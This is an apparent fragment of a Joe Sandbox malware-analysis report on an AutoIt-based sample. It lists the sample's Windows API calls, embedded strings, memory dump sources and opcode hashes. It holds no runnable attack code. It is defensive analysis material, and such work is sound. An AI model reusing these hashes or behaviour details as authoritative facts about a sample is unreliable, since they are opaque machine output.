                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DestroyMove
                                                                            • String ID: static
                                                                            • API String ID: 2139405536-2160076837
                                                                            • Opcode ID: 93f4a911bb1e75a87d7419e7e45d2a786e6ef38ed91cdb6cf7c045983cc5a2ba
                                                                            • Instruction ID: c3d9e8c5c14c8932e0d8dcad6df27f04e885f4d74835bfaa9eb522efbff187f9
                                                                            • Opcode Fuzzy Hash: 93f4a911bb1e75a87d7419e7e45d2a786e6ef38ed91cdb6cf7c045983cc5a2ba
                                                                            • Instruction Fuzzy Hash: 0431A171110608AEDB119F74CC80BFBB3A9FF48760F109629FA9987191DB31ACA5CB60
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002D30B8
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D30F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: ff0f9ba1d9dc4314913ab0d08f3d386dc8ef08d3d9950d91498794bf96ec013a
                                                                            • Instruction ID: 38032593067b35715f1f8ca90c1a9c6477ebbf11d48ecbb9b19434d0d6b5ebee
                                                                            • Opcode Fuzzy Hash: ff0f9ba1d9dc4314913ab0d08f3d386dc8ef08d3d9950d91498794bf96ec013a
                                                                            • Instruction Fuzzy Hash: FB31D73161020B9BEB25DF54C885BAEBBB8FF05350F14401AE889A6391D7B0DF64CB52
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 002E4132
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __snwprintf_memmove
                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                            • API String ID: 3506404897-2584243854
                                                                            • Opcode ID: 128e705f2a0d33b8e257b35a44d4f0440221bd1df565ea6001f90fc23860a2e4
                                                                            • Instruction ID: 1ac8ec6ce347ce6577e9ff5b7aafddec3b111dfb9b3e9a02ee4ca9db39b3879e
                                                                            • Opcode Fuzzy Hash: 128e705f2a0d33b8e257b35a44d4f0440221bd1df565ea6001f90fc23860a2e4
                                                                            • Instruction Fuzzy Hash: 2521E334A60219AFCF00FF64D895EEE77B9AF04300F400459F908AB181DB70AA61DFA2
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002F6D86
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002F6D91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            • Opcode ID: 11587fb46f3e01f90777fa0bd6f6fc6957380d95907ab7e23e3dbd5eb5345d58
                                                                            • Instruction ID: ab2d97300a5963e5cff3cbdaecbbd337e46ae94507cb7b515ceb2e7ce56a49ed
                                                                            • Opcode Fuzzy Hash: 11587fb46f3e01f90777fa0bd6f6fc6957380d95907ab7e23e3dbd5eb5345d58
                                                                            • Instruction Fuzzy Hash: 5411907132020DAFEF258E54DC85EBB7B6AEB843A4F114135FA189B291D6719C608B60
                                                                            APIs
                                                                              • Part of subcall function 00272111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0027214F
                                                                              • Part of subcall function 00272111: GetStockObject.GDI32(00000011), ref: 00272163
                                                                              • Part of subcall function 00272111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0027216D
                                                                            • GetWindowRect.USER32(00000000,?), ref: 002F7296
                                                                            • GetSysColor.USER32(00000012), ref: 002F72B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                            • String ID: static
                                                                            • API String ID: 1983116058-2160076837
                                                                            • Opcode ID: 88c7226e259fbbf135ddc958a6be6cb710d0290bc039ebfdea9deb52a0b1d9e9
                                                                            • Instruction ID: add7fdfaa113bbb4c9cd0e8370e24c321c77da759b883baee54852c1303f18e0
                                                                            • Opcode Fuzzy Hash: 88c7226e259fbbf135ddc958a6be6cb710d0290bc039ebfdea9deb52a0b1d9e9
                                                                            • Instruction Fuzzy Hash: 2821177262420AAFDB05DFB8CC45EFABBA8EB08354F004529FE55D3251D735A8619B50
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002D31C9
                                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002D31E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: c4873bf4553ff37a2d165ef091d13db108ff091a099a1f5c2ad064ef0e332c17
                                                                            • Instruction ID: d0db7570bad796d3c29960f78fcb7db3251986e8d0ec5ea553b22af0440c3447
                                                                            • Opcode Fuzzy Hash: c4873bf4553ff37a2d165ef091d13db108ff091a099a1f5c2ad064ef0e332c17
                                                                            • Instruction Fuzzy Hash: 7611347292411BABDB21DF98DC45B9D73B8AB46300F140123E809E73A0D770EF29CB92
                                                                            APIs
                                                                            • DeleteObject.GDI32(?), ref: 0027351D
                                                                            • DestroyWindow.USER32(?,?,00284E61), ref: 00273576
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteDestroyObjectWindow
                                                                            • String ID: h0
                                                                            • API String ID: 2587070983-1319028847
                                                                            • Opcode ID: ff83ccc9a4b8aa74b45a9376b814383d8aba8f665014c2fdb35b87588ded6b94
                                                                            • Instruction ID: 1fcddcccf1cebf1de8d2219d6bb5b1064328f7a52e5c1ea3123fc8036ab87706
                                                                            • Opcode Fuzzy Hash: ff83ccc9a4b8aa74b45a9376b814383d8aba8f665014c2fdb35b87588ded6b94
                                                                            • Instruction Fuzzy Hash: 022112B47292118FDB3ADF18D899B2533E9AB48711F448159E80E8B2A0CB71DE60EF41
                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002E28F8
                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002E2921
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$OpenOption
                                                                            • String ID: <local>
                                                                            • API String ID: 942729171-4266983199
                                                                            • Opcode ID: 4159ffc981524eca635bb3a596de7a16d6b3be87122751535967bbfc8c9aa716
                                                                            • Instruction ID: d326671efb08ace2cec0bd81cea2236c71926a7d3b065651df4980b1b70617c5
                                                                            • Opcode Fuzzy Hash: 4159ffc981524eca635bb3a596de7a16d6b3be87122751535967bbfc8c9aa716
                                                                            • Instruction Fuzzy Hash: A511E370591266FAEB29CF528C89EF7FB6CFF05750F50412AF54A42100E7B06868D6F0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp
                                                                            • String ID: 0.0.0.0$L,0
                                                                            • API String ID: 856254489-2909280120
                                                                            APIs
                                                                              • Part of subcall function 002E86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,002E849D,?,00000000,?,?), ref: 002E86F7
                                                                            • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002E84A0
                                                                            • htons.WSOCK32(00000000,?,00000000), ref: 002E84DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 2496851823-2422070025
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002CB7BD
                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002C9A2B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0027BC07
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            • _wcscat.LIBCMT ref: 002B3593
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FullNamePath_memmove_wcscat
                                                                            • String ID: s3
                                                                            • API String ID: 257928180-1609818047
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock_memmove
                                                                            • String ID: EA06
                                                                            • API String ID: 1988441806-3962188686
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002CB7BD
                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 002C9923
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002CB7BD
                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 002C99A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __calloc_crt
                                                                            • String ID: @b3
                                                                            • API String ID: 3494438863-1740651745
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp
                                                                            • String ID: #32770
                                                                            • API String ID: 2292705959-463685578
                                                                            APIs
                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002C88A0
                                                                              • Part of subcall function 00293588: _doexit.LIBCMT ref: 00293592
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Message_doexit
                                                                            • String ID: AutoIt$Error allocating memory.
                                                                            • API String ID: 1993061046-4017498283
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 002B0091
                                                                              • Part of subcall function 002EC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,002B027A,?), ref: 002EC6E7
                                                                              • Part of subcall function 002EC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002EC6F9
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 002B0289
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                            • String ID: WIN_XPe
                                                                            • API String ID: 582185067-3257408948
APIs
• DestroyIcon.USER32(,z30z3,00337A2C,00337890,?,00285A53,00337A2C,00337A30,?,00000004), ref: 00285823
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: DestroyIcon
• String ID: ,z30z3$SZ(,z30z3
• API String ID: 1234817797-3370825192